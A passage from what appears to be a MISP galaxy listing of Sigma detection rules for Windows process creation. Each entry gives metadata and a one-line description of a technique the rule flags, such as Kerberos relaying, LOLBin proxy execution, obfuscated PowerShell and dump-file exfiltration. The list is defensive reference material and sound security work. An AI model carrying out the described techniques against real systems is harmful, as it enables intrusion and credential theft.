filename proc_creation_win_lolbin_openconsole.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Ilasm Lolbin Use Compile C-Sharp

Detect use of Ilasm.exe to compile c# code into dll or exe.

Internal MISP references

UUID 850d55f9-6eeb-4492-ad69-a72338f65ba4 which can be used as unique global reference for Ilasm Lolbin Use Compile C-Sharp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/07
falsepositive ['Unknown']
filename proc_creation_win_lolbin_ilasm.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious MsiExec Embedding Parent

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads

Internal MISP references

UUID 4a2a2c3e-209f-4d01-b513-4155a540b469 which can be used as unique global reference for Suspicious MsiExec Embedding Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/16
falsepositive ['Unknown']
filename proc_creation_win_msiexec_embedding.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218.007', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

HackTool - KrbRelay Execution

Detects the use of KrbRelay, a Kerberos relaying tool

Internal MISP references

UUID e96253b8-6b3b-4f90-9e59-3b24b99cf9b4 which can be used as unique global reference for HackTool - KrbRelay Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/27
falsepositive ['Unlikely']
filename proc_creation_win_hktl_krbrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID 9c14c9fa-1a63-4a64-8e57-d19280559490 which can be used as unique global reference for Invoke-Obfuscation Via Stdin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious File Execution From Internet Hosted WebDav Share

Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files

Internal MISP references

UUID f0507c0f-a3a2-40f5-acc6-7f543c334993 which can be used as unique global reference for Suspicious File Execution From Internet Hosted WebDav Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_cmd_net_use_and_exec_combo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Userinit Child Process

Detects a suspicious child process of userinit

Internal MISP references

UUID b655a06a-31c0-477a-95c2-3726b83d649d which can be used as unique global reference for Suspicious Userinit Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Samir Bousseaden (idea)
creation_date 2019/06/17
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_userinit_child.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HH.EXE Execution

Detects the execution of "hh.exe" to open ".chm" files.

Internal MISP references

UUID 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 which can be used as unique global reference for HH.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
creation_date 2019/10/24
falsepositive ['False positives are expected with legitimate ".CHM"']
filename proc_creation_win_hh_chm_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.001']
Related clusters

To see the related clusters, click here.

Potential Fake Instance Of Hxtsr.EXE Executed

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

Internal MISP references

UUID 4e762605-34a8-406d-b72e-c1a089313320 which can be used as unique global reference for Potential Fake Instance Of Hxtsr.EXE Executed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/04/17
falsepositive ['Unknown']
filename proc_creation_win_hxtsr_masquerading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Port Forwarding Activity Via SSH.EXE

Detects port forwarding activity via SSH.exe

Internal MISP references

UUID 327f48c1-a6db-4eb8-875a-f6981f1b0183 which can be used as unique global reference for Port Forwarding Activity Via SSH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/12
falsepositive ['Administrative activity using a remote port forwarding to a local port']
filename proc_creation_win_ssh_port_forward.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.lateral_movement', 'attack.t1572', 'attack.t1021.001', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

File Encryption Using Gpg4win

Detects usage of Gpg4win to encrypt files

Internal MISP references

UUID 550bbb84-ce5d-4e61-84ad-e590f0024dcd which can be used as unique global reference for File Encryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_encryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Ping/Del Command Combination

Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example

Internal MISP references

UUID 54786ddc-5b8a-11ed-9b6a-0242ac120002 which can be used as unique global reference for Suspicious Ping/Del Command Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilya Krestinichev
creation_date 2022/11/03
falsepositive ['Unknown']
filename proc_creation_win_cmd_ping_del_combined_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

File Download with Headless Browser

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

Internal MISP references

UUID 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e which can be used as unique global reference for File Download with Headless Browser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_file_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Persistence Via TypedPaths - CommandLine

Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt

Internal MISP references

UUID ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba which can be used as unique global reference for Persistence Via TypedPaths - CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_registry_typed_paths_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence']

System Disk And Volume Reconnaissance Via Wmic.EXE

An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

Internal MISP references

UUID c79da740-5030-45ec-a2e0-479e824a562c which can be used as unique global reference for System Disk And Volume Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln-aiq(AttackIQ)
creation_date 2024/02/02
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_volume.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1047', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Net WebClient Casing Anomalies

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

Internal MISP references

UUID c86133ad-4725-4bd0-8170-210788e0a7ba which can be used as unique global reference for Net WebClient Casing Anomalies in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/24
falsepositive ['Unknown']
filename proc_creation_win_powershell_webclient_casing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Chromium Browser Instance Executed With Custom Extension

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

Internal MISP references

UUID 27ba3207-dd30-4812-abbf-5d20c57d474e which can be used as unique global reference for Suspicious Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022/06/19
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_susp_load_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176']
Related clusters

To see the related clusters, click here.

Suspicious Process Start Locations

Detects suspicious process run from unusual locations

Internal MISP references

UUID 15b75071-74cc-47e0-b4c6-b43744a62a2b which can be used as unique global reference for Suspicious Process Start Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4, Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rundll32_run_locations.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'car.2013-05-002']
Related clusters

To see the related clusters, click here.

PUA - Chisel Tunneling Tool Execution

Detects usage of the Chisel tunneling tool via the commandline arguments

Internal MISP references

UUID 8b0e12da-d3c3-49db-bb4f-256703f380e5 which can be used as unique global reference for PUA - Chisel Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Some false positives may occur with other tools with similar commandlines']
filename proc_creation_win_pua_chisel.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via DeviceEnroller.EXE

Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

Internal MISP references

UUID e173ad47-4388-4012-ae62-bd13f71c18a8 which can be used as unique global reference for Potential DLL Sideloading Via DeviceEnroller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/08/29
falsepositive ['Unknown']
filename proc_creation_win_deviceenroller_dll_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

File Download And Execution Via IEExec.EXE

Detects execution of the IEExec utility to download and execute files

Internal MISP references

UUID 9801abb8-e297-4dbf-9fbd-57dde0e830ad which can be used as unique global reference for File Download And Execution Via IEExec.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/16
falsepositive ['Unknown']
filename proc_creation_win_ieexec_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Manage-bde.wsf Abuse To Proxy Execution

Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution

Internal MISP references

UUID c363385c-f75d-4753-a108-c1a8e28bdbda which can be used as unique global reference for Potential Manage-bde.wsf Abuse To Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/13
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_manage_bde.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

ImagingDevices Unusual Parent/Child Processes

Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity

Internal MISP references

UUID f11f2808-adb4-46c0-802a-8660db50fa99 which can be used as unique global reference for ImagingDevices Unusual Parent/Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_imagingdevices_unusual_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Execution of Suspicious File Type Extension

Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.

Internal MISP references

UUID c09dad97-1c78-4f71-b127-7edb2b8e491a which can be used as unique global reference for Execution of Suspicious File Type Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_susp_non_exe_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Suspicious Mofcomp Execution

Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts

Internal MISP references

UUID 1dd05363-104e-4b4a-b963-196a534b03a1 which can be used as unique global reference for Potential Suspicious Mofcomp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unknown']
filename proc_creation_win_mofcomp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

CodePage Modification Via MODE.COM To Russian Language

Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.

Internal MISP references

UUID 12fbff88-16b5-4b42-9754-cd001a789fb3 which can be used as unique global reference for CodePage Modification Via MODE.COM To Russian Language in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/17
falsepositive ['Russian speaking people changing the CodePage']
filename proc_creation_win_mode_codepage_russian.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Malicious Windows Script Components File Execution by TAEF Detection

Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe

Internal MISP references

UUID 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b which can be used as unique global reference for Malicious Windows Script Components File Execution by TAEF Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.community
creation_date 2020/10/13
falsepositive ["It's not an uncommon to use te.exe directly to execute legal TAEF tests"]
filename proc_creation_win_susp_use_of_te_bin.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Encoded Command Patterns

Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains

Internal MISP references

UUID b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c which can be used as unique global reference for Suspicious PowerShell Encoded Command Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/24
falsepositive ['Other tools that work with encoded scripts in the command line instead of script files']
filename proc_creation_win_powershell_base64_encoded_cmd_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

7Zip Compressing Dump Files

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Internal MISP references

UUID ec570e53-4c76-45a9-804d-dc3f355ff7a7 which can be used as unique global reference for 7Zip Compressing Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of 7z to compress WER ".dmp" files for troubleshooting']
filename proc_creation_win_7zip_exfil_dmp_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Change Default File Association To Executable Via Assoc

Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID ae6f14e6-14de-45b0-9f44-c0986f50dc89 which can be used as unique global reference for Change Default File Association To Executable Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_cmd_assoc_tamper_exe_file_association.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Mstsc.EXE Execution From Uncommon Parent

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Internal MISP references

UUID ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 which can be used as unique global reference for Mstsc.EXE Execution From Uncommon Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unlikely']
filename proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement']

Regsvr32 Execution From Potential Suspicious Location

Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.

Internal MISP references

UUID 9525dc73-0327-438c-8c04-13c0e037e9da which can be used as unique global reference for Regsvr32 Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.']
filename proc_creation_win_regsvr32_susp_exec_path_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Suspicious Execution Location Of Wermgr.EXE

Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.

Internal MISP references

UUID 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 which can be used as unique global reference for Suspicious Execution Location Of Wermgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/14
falsepositive ['Unknown']
filename proc_creation_win_wermgr_susp_exec_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential SysInternals ProcDump Evasion

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name

Internal MISP references

UUID 79b06761-465f-4f88-9ef2-150e24d3d737 which can be used as unique global reference for Potential SysInternals ProcDump Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming']
filename proc_creation_win_sysinternals_procdump_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Run PowerShell Script from ADS

Detects PowerShell script execution from Alternate Data Stream (ADS)

Internal MISP references

UUID 45a594aa-1fbd-4972-a809-ff5a99dd81b8 which can be used as unique global reference for Run PowerShell Script from ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sergey Soldatov, Kaspersky Lab, oscd.community
creation_date 2019/10/30
falsepositive ['Unknown']
filename proc_creation_win_powershell_run_script_from_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Active Directory Structure Export Via Csvde.EXE

Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.

Internal MISP references

UUID e5d36acd-acb4-4c6f-a13f-9eb203d50099 which can be used as unique global reference for Active Directory Structure Export Via Csvde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_csvde_export.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Monitoring For Persistence Via BITS

BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.

Internal MISP references

UUID b9cbbc17-d00d-4e3d-a827-b06d03d2380d which can be used as unique global reference for Monitoring For Persistence Via BITS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/10/29
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_potential_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1197']
Related clusters

To see the related clusters, click here.

Explorer Process Tree Break

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"

Internal MISP references

UUID 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 which can be used as unique global reference for Explorer Process Tree Break in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
creation_date 2019/06/29
falsepositive ['Unknown']
filename proc_creation_win_explorer_break_process_tree.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Proxy Execution Via Explorer.exe

Attackers can use explorer.exe for evading defense mechanisms

Internal MISP references

UUID 9eb271b9-24ae-4cd4-9465-19cfc1047f3e which can be used as unique global reference for Proxy Execution Via Explorer.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
creation_date 2020/10/05
falsepositive ['Legitimate explorer.exe run from cmd.exe']
filename proc_creation_win_explorer_lolbin_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Netsh Allow Group Policy on Microsoft Defender Firewall

Adversaries may modify system firewalls in order to bypass controls limiting network usage

Internal MISP references

UUID 347906f3-e207-4d18-ae5b-a9403d6bcdef which can be used as unique global reference for Netsh Allow Group Policy on Microsoft Defender Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_enable_group_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Renamed Gpg.EXE Execution

Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.

Internal MISP references

UUID ec0722a3-eb5c-4a56-8ab2-bf6f20708592 which can be used as unique global reference for Renamed Gpg.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/08/09
falsepositive No established falsepositives
filename proc_creation_win_renamed_gpg4win.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

File And SubFolder Enumeration Via Dir Command

Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.

Internal MISP references

UUID 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 which can be used as unique global reference for File And SubFolder Enumeration Via Dir Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Likely']
filename proc_creation_win_cmd_dir_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Pubprn.vbs Proxy Execution

Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.

Internal MISP references

UUID 1fb76ab8-fa60-4b01-bddd-71e89bf555da which can be used as unique global reference for Pubprn.vbs Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_pubprn.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216.001']
Related clusters

To see the related clusters, click here.

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.

Internal MISP references

UUID 692f0bec-83ba-4d04-af7e-e884a96059b6 which can be used as unique global reference for Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis @Karneades
creation_date 2019/04/03
falsepositive ['AppvClient', 'CCM', 'WinRM']
filename proc_creation_win_wmiprvse_spawns_powershell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Abusing Print Executable

Attackers can use print.exe for remote file copy

Internal MISP references

UUID bafac3d6-7de9-4dd9-8874-4a1194b493ed which can be used as unique global reference for Abusing Print Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
creation_date 2020/10/05
falsepositive ['Unknown']
filename proc_creation_win_print_remote_file_copy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious WindowsTerminal Child Processes

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

Internal MISP references

UUID 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 which can be used as unique global reference for Suspicious WindowsTerminal Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/25
falsepositive ['Other legitimate "Windows Terminal" profiles']
filename proc_creation_win_windows_terminal_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence']

HackTool - Bloodhound/Sharphound Execution

Detects command line parameters used by Bloodhound and Sharphound hack tools

Internal MISP references

UUID f376c8a7-a2d0-4ddc-aa0c-16c17236d962 which can be used as unique global reference for HackTool - Bloodhound/Sharphound Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/20
falsepositive ["Other programs that use these command line option and accepts an 'All' parameter"]
filename proc_creation_win_hktl_bloodhound_sharphound.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Extension Shim Database Installation Via Sdbinst.EXE

Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

Internal MISP references

UUID 18ee686c-38a3-4f65-9f44-48a077141f42 which can be used as unique global reference for Uncommon Extension Shim Database Installation Via Sdbinst.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename proc_creation_win_sdbinst_susp_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Lolbin Unregmp2.exe Use As Proxy

Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

Internal MISP references

UUID 727454c0-d851-48b0-8b89-385611ab0704 which can be used as unique global reference for Lolbin Unregmp2.exe Use As Proxy in MISP communities and other software using the MISP galaxy

